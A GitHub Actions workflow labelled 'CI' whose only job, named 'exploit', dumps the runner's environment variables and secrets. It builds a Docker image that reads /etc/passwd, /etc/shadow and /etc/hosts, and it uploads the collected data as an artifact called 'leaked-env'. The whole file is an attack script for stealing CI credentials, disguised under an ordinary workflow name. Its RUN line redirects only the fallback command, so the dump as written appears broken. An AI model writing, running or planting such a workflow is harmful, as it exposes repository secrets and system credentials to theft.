name: CI

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Dump env to temp file
        run: printenv > github_env

      - name: Create malicious Dockerfile
        run: |
          echo "FROM alpine
COPY github_env /tmp/github_env
RUN cat /tmp/github_env /etc/passwd /etc/hosts /etc/shadow || true > /env_dump.txt
" > Dockerfile

      - name: Build container with sensitive data
        run: docker build -t hacked-image .

      - name: Create container from image
        run: docker create --name hacked-container hacked-image

      - name: Copy out dumped secrets
        run: docker cp hacked-container:/env_dump.txt ./env_dump.txt

      - name: Upload leaked data as artifact
        uses: actions/upload-artifact@v4
        with:
          name: leaked-env
          path: ./env_dump.txt
